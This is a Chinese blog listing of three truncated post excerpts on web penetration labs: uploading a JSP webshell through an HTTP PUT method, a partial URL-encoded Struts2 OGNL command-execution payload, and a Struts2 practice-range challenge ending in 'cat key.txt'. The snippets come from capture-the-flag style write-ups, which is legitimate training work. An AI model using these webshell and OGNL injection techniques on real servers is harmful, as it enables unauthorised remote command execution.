摘要:
options查看服务端允许得方法 可以看见有put 那就写一个木马进去 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd( 阅读全文
摘要:
漏洞原理:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式 任意命令执行Exp:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletAc 阅读全文
摘要:
想起来之前在360众测靶场做过 通过背景可以知道是struts2框架 扫描一下 cat key.txt 阅读全文